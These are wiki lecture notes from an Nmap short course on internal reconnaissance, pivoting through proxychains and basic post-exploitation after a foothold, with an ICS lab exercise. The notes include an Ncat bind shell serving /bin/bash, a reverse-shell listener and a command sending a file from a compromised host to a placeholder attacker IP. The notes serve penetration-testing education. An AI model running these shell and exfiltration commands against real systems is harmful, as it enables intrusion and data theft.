Main page: Nmap/Short Course

Summary and Objective

This lecture will discuss how Nmap's findings and capabilities support later stages of a penetration test, including internal reconnaissance and basic post-exploitation actions, often in conjunction with tools like Ncat.

Objective: To explain how Nmap is utilized beyond initial reconnaissance and scanning in a penetration test, specifically for internal network mapping after gaining a foothold, enabling pivoting techniques, and supporting basic post-exploitation tasks conceptually, often alongside Ncat.

Notes

Recap & Introduction to Nmap's Role in Pen Testing Phases

Quick Recap of Lecture 7

In our previous session, we focused on deep service enumeration using Nmap and its scripting engine. We learned how to gather detailed information from common services like HTTP/HTTPS, SSH, FTP, and SMB, which is crucial for comprehensive attack surface mapping. We also had our first introduction to Ncat for basic manual service interaction and banner grabbing.

Overview of Typical Penetration Testing Phases

A typical penetration test follows a structured methodology, often broken down into phases:

Reconnaissance: Gathering information about the target (passive and active).
Scanning & Enumeration: Identifying live hosts, open ports, services, versions, vulnerabilities, and system configurations.
Gaining Access (Exploitation): Leveraging identified vulnerabilities to compromise a system.
Maintaining Access: Ensuring persistent access to the compromised system or network.
Covering Tracks: Removing evidence of the compromise (less common in pure security assessments, more of an attacker TTP). A crucial, often iterative, step after gaining initial access is Internal Reconnaissance/Pivoting to understand the internal network and move laterally.

Nmap's Role Across Phases

Nmap is a cornerstone tool for the Reconnaissance and Scanning & Enumeration phases. However, its utility doesn't stop there. The information Nmap provides is vital for selecting appropriate exploits in the Gaining Access phase. Furthermore, Nmap becomes indispensable again after initial access for performing Internal Reconnaissance from the perspective of a compromised host. It can also support Maintaining Access by identifying stable internal systems or services.

Nmap: Not an Exploitation Tool, But a Critical Enabler

It's crucial to reiterate that Nmap itself is generally not an exploitation tool (though some NSE scripts in the exploit category exist, they are for specific, often proof-of-concept, exploits and are not a replacement for dedicated exploitation frameworks like Metasploit). Instead, Nmap provides the detailed intelligence required to effectively use exploitation tools. Its findings guide decisions on which exploits to try, which targets are most valuable, and how to navigate the internal network post-compromise.

Nmap for Internal Reconnaissance After Initial Access

Once a penetration tester gains an initial foothold on a system within the target network, the game changes. The focus shifts to understanding the internal landscape.

The Scenario: You're In. Now What?

Imagine you've successfully compromised an external-facing web server. This server now becomes your beachhead into the internal network. From this compromised host, you can often reach internal network segments that were completely inaccessible from the outside. The immediate goal is to map out this new territory.

Using Nmap from the Compromised Host

If Nmap is already installed on the compromised host (less common on hardened servers but possible on developer machines or less secure systems), or if you can upload a static binary of Nmap, you can run scans directly from it. This provides the most accurate view of what that host can "see."

Discovering Internal Hosts: Use nmap -sn to identify live hosts on adjacent internal subnets.
Scanning Internal Services: Perform standard port scans (-sS if you have root/admin on the compromised host, otherwise -sT) and version detection (-sV) against newly discovered internal hosts.
Identifying Key Internal Systems: Look for domain controllers (ports 88, 389, 445, etc.), database servers (1433, 3306, 5432), file shares, internal web applications, and administrative interfaces that are not exposed externally.
Mapping Trust Relationships: Understanding which internal systems communicate with each other can reveal pathways for lateral movement.

# On the compromised host (assuming Nmap is available and you have appropriate privileges):
# Ping sweep an internal subnet
nmap -sn 10.10.0.0/24

# Scan a specific internal host for common TCP ports with version detection
nmap -sS -sV -T4 10.10.0.15

# Scan for Windows domain controller related ports on an internal server
nmap -p 88,135,139,389,445,464,593,636,3268,3269 -sV 10.10.0.10

Challenges of Internal Scanning

Limited Toolset: The compromised host might have a minimal OS installation without Nmap or necessary libraries. Uploading tools might be restricted or trigger alerts.

Detection: Internal network traffic is often more closely monitored. Aggressive Nmap scans could be detected by Network Intrusion Detection Systems (NIDS) or Security Operations Center (SOC) analysts. Slower, more targeted scans (-T2, specific ports) might be necessary.

Permissions: You might have compromised the host as a low-privileged user, limiting your ability to perform raw packet scans like -sS.

Pivoting with Nmap: Scanning Through Compromised Hosts

Pivoting is a fundamental technique for extending reach within a target network.

What is Pivoting?

Pivoting is the technique of using a compromised system to attack or scan other systems that are not directly accessible from your attacking machine. The compromised host acts as a "pivot point" or proxy, relaying your traffic into the internal network. This is essential when the compromised host is multi-homed (connected to multiple networks) or when you want to scan internal targets as if you were originating from that compromised system.

Using Nmap with Proxy Tools (e.g., proxychains)

If you can't install/run Nmap directly on the compromised host, but you can establish a proxy or tunnel through it (e.g., via an SSH tunnel, or by running a SOCKS proxy server like ssh -D or a dedicated tool on the compromised machine), you can then use tools like proxychains on your attacking machine to route Nmap's traffic through the pivot.

proxychains Explanation: proxychains (or proxychains-ng) is a tool that hooks network calls from applications (like Nmap) and redirects them through one or more configured proxies.

Configuration: You'd typically configure proxychains.conf (often in /etc/proxychains.conf) to point to the SOCKS proxy you've set up on or through the compromised host.

# Example proxychains.conf entry (at the bottom of the file)
# socks5  127.0.0.1 1080  # If you've SSH -D 1080 user@compromised_host
# or
# socks4  <compromised_host_IP> <proxy_port_on_compromised_host>

Running Nmap with proxychains:

# Run Nmap through the configured proxy (usually TCP connect scan is more reliable)
proxychains nmap -sT -Pn -n <internal_target_IP>

Note: TCP SYN scans (-sS) often do not work correctly through generic TCP proxies like those used by proxychains because the proxy handles the TCP handshake itself. Therefore, TCP Connect scans (-sT) are typically used. The -Pn option (skip host discovery) is often necessary because ICMP/ARP pings usually won't route correctly through the proxy. The -n option (no DNS resolution) is also good practice to prevent DNS leaks.

Advantages and Considerations of Proxychains

Advantages: Allows you to use your fully-featured Nmap installation on your attacking machine, even if the compromised host has no tools. The scan originates from the compromised host's IP, making it appear internal.

Considerations: Scanning through proxies is generally slower than direct scanning. The stability of the scan depends on the stability of the proxy connection and the compromised host. Not all Nmap scan types work well through proxies.

Nmap & Ncat in Post-Exploitation (Conceptual Data Exfil/Listeners)

Nmap's findings and Ncat's versatility can support basic post-exploitation activities.

Nmap Findings Guiding Post-Exploitation

The detailed internal network map created by Nmap scans (run directly or via pivot) helps identify high-value targets for post-exploitation. For example, Nmap might identify:

File servers with potentially sensitive shares (e.g., smb-enum-shares results).
Internal database servers that might contain critical data.
Domain controllers where credential theft might be attempted.
Less secure internal systems that could be easier to compromise further for deeper access. This intelligence informs what to target next and what tools or techniques might be effective.

Ncat for Basic Post-Exploitation Tasks

Ncat can be used for simple but effective post-exploitation actions:

Setting up Listeners: On a compromised host, Ncat can create a listener on a specific port, waiting for an incoming connection. This is often used to catch reverse shells from other internal systems you might exploit, or for simple data transfer.

# On the compromised host, listen on port 4444
ncat -lvnp 4444

# Or, to redirect a reverse shell to your attacker machine via a bind shell on compromised host:
# (VERY DANGEROUS - creates an unauthenticated shell!)
ncat -lvnp 4444 -e /bin/bash

# (Instructor: Emphasize extreme danger of -e /bin/bash and that dedicated shells are better)

Transferring Files: Ncat can be used for basic file exfiltration (pulling files from a compromised host) or for uploading tools/scripts to a compromised host.

To receive a file on your attacker machine (listener):

ncat -lvnp 1234 > received_file.dat

To send a file from the compromised host:

ncat <your_attacker_IP> 1234 < file_to_send.dat

This is useful for small files; for larger or more robust transfers, other methods (like SCP, dedicated C2 channels) are preferred.

How Nmap Guides Ncat Actions

Nmap's internal reconnaissance plays a crucial role here. For example:

Nmap might identify that a compromised host can make outbound connections on a specific port (e.g., TCP 443) that isn't blocked by an egress firewall. This information would then guide you to set up your Ncat listener for a reverse shell on your attacking machine on that specific port.
Nmap might identify an internal host that is less monitored, making it a safer place to stage tools uploaded via Ncat.

Conceptual Nature and Limitations

It's important for students to understand that while Nmap and Ncat can support these post-exploitation steps, they are not full-fledged Command and Control (C2) frameworks.

Professional penetration testers use tools like Metasploit (Meterpreter), Cobalt Strike, or custom C2 tools for robust shell access, complex pivoting, data exfiltration, and maintaining persistence.

Nmap and Ncat are excellent for reconnaissance, initial interactions, and simpler post-exploitation tasks.

Lab

Simulate initial access to one machine in the ICS network (Scenario 2). Students then use Nmap (perhaps with adjusted timing for stealth) from this "compromised" point to map out deeper segments of the ICS network, identifying sensitive control systems.

Nmap/Short Course/Lab 8

Flags

Nmap/Short Course/Lecture 8

From charlesreid1

Contents